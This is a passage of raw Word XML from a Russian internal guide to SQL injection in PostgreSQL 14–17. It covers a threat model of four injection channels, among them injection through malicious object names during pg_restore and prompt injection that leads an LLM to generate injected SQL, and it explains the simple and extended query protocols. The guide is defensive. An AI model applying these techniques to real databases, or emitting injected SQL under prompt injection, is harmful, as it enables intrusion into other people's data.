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44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-инъекции в PostgreSQL: техническая документация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внутренний справочник для команды DS-workshop2.0. Версии PostgreSQL 14–17.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 Зачем эта дока, для кого</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Документ предназначен для разработчиков и инженеров команды DS-workshop2.0 и описывает категории SQL-инъекций, специфичные для PostgreSQL 14–17. Читается как от начала до конца, так и как справочник по конкретной категории. Целевая аудитория знает SQL и общую концепцию инъекций, но не обязательно знает PG-специфику.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Область действия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope: PostgreSQL 14–17, фокус на инъекциях в application-layer SQL и серверном динамическом SQL (plpgsql).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вне scope: data-hygiene checks из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE.md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SELECT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UPDATE/DELETE</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неограниченный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прямой доступ к чувствительным полям. Эти классы покрыты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не относятся напрямую к инъекциям.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Модель угроз: где в системе появляются SQL-инъекции</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В системе DS-workshop2.0 SQL-инъекции могут попасть в БД через четыре канала. Все четыре независимы; в реальной архитектуре могут присутствовать несколько одновременно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 1 — HTTP application layer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Классический случай: HTTP-параметр (query string, body, path-параметр, header) попадает в SQL-запрос через текстовую конкатенацию или ORM-шаблон, исполняемый без параметризации. Это покрывает большую часть категорий 3.1–3.4, 3.6, 3.14, 3.15.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 2 — серверный динамический SQL (plpgsql).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Хранимые функции на plpgsql, использующие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 конкатенацией строк или с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', ...)</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format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для идентификаторов. Канал серверный — язык приложения здесь не имеет значения. Покрывается категорией 3.16.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 3 — dump/restore pipeline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Атакующий, имеющий право создавать объекты в схеме, вставляет специальные символы (newline, кавычки) в имя объекта;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сериализует имя в SQL-комментарий или в DDL; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> разрывается на этом и выполняет injected SQL на стороне восстанавливающего пользователя. Канал async по времени: эксплуатируется не во время работы приложения, а во время DBA-операций. Покрывается категорией 3.12.3 (см. CVE-2025-8715).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 4 — LLM-генератор SQL под prompt injection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Запрос к LLM формируется по недоверенному входу (пользовательский текст в RAG-контексте, документ, transcript), модель порождает SQL с инъекцией внутри, сгенерированный SQL уходит в БД. С точки зрения SQL-инъекции — это тот же канал 1, но точка инъекции находится не в HTTP-параметре, а в prompt-инструкции. С точки зрения архитектуры — это новый класс, потому что традиционные input-санитайзеры (validation на API-границе) не применимы: вход модели уже на стороне приложения, и валидировать нужно output модели. Защита — судья как раз и есть основной механизм против этого канала.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Как читать документ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Документ можно читать линейно — структура от простых техник к сложным. Можно использовать как справочник: каждая категория самодостаточна, имеет обзор и набор паттернов с примерами. Внутренние ссылки на другие разделы (3.X.N) даны для понимания комбинаций — переходить по ним не обязательно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Контекст PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Прежде чем разбирать конкретные категории инъекций, нужно зафиксировать четыре механизма PostgreSQL, которые определяют поверхность атаки: как именно SQL доходит до планировщика, как устроена модель привилегий, как работают расширения и как взаимодействуют схемы со </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Каждый из этих механизмов прямо влияет на то, какие payload-ы работают, какие — нет, и какие митигации применимы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Архитектура исполнения SQL: simple vs extended query protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL обменивается с клиентом по бинарному wire-протоколу, описанному в Frontend/Backend Protocol. Для выполнения SQL протокол предусматривает два режима — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simple query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extended query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Различие между ними настолько фундаментально, что определяет работоспособность целой категории инъекций (см. 3.5 Stacked queries), а также объясняет, почему параметризованные запросы дают сильную защиту именно от инъекций, а не «просто стиль кода».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple query.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Клиент посылает одно сообщение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(Query) с текстом SQL. Сервер парсит этот текст, планирует, выполняет и возвращает результат. Текст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может содержать любое число команд, разделённых точкой с запятой — все они будут выполнены последовательно. Параметры в этом режиме не передаются отдельно: значения нужно вставить в текст SQL до отправки. Это означает, что любое экранирование делает клиент, а сервер видит уже готовую строку.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended query.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Клиент шлёт три (или больше) сообщения подряд: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с текстом SQL и placeholder-ами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Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> со значениями параметров;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для запуска. Текст SQL парсится один раз, значения параметров передаются отдельным сообщением и не парсятся как SQL — они доезжают до executor как уже типизированные значения. Главное правило этого режима: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принимает ровно одну команду. Попытка отправить multi-statement даёт ошибку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это серверное правило, его невозможно обойти ни одним клиентом, корректно работающим через extended-протокол.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение в таблице: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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Свойство</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Simple query (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Q</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Extended query (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Parse</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bind</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Execute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>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Число сообщений на запрос</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 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">P</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B</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E</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Параметры</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Подставляются клиентом в текст SQL</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Передаются отдельным сообщением как значения</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Multi-statement в одном запросе</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Разрешён</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Запрещён: ошибка </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cannot insert multiple commands…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Парсинг плана</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Каждый раз</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Один раз, плюс кэширование (prepared statement)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Где живёт защита</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Только в клиенте (escape)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На сервере (значения вообще не парсятся)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из этой архитектуры следуют три практических вывода для остальной доки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Во-первых, термин «параметризованный запрос» — это не стиль написания кода, а конкретный режим протокола. Запрос вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM t WHERE id = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, отправленный через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со строкой-склейкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$1 → '42'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, формально использует знак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но никакой защиты от инъекций не даёт. И наоборот, тот же </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM t WHERE id = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
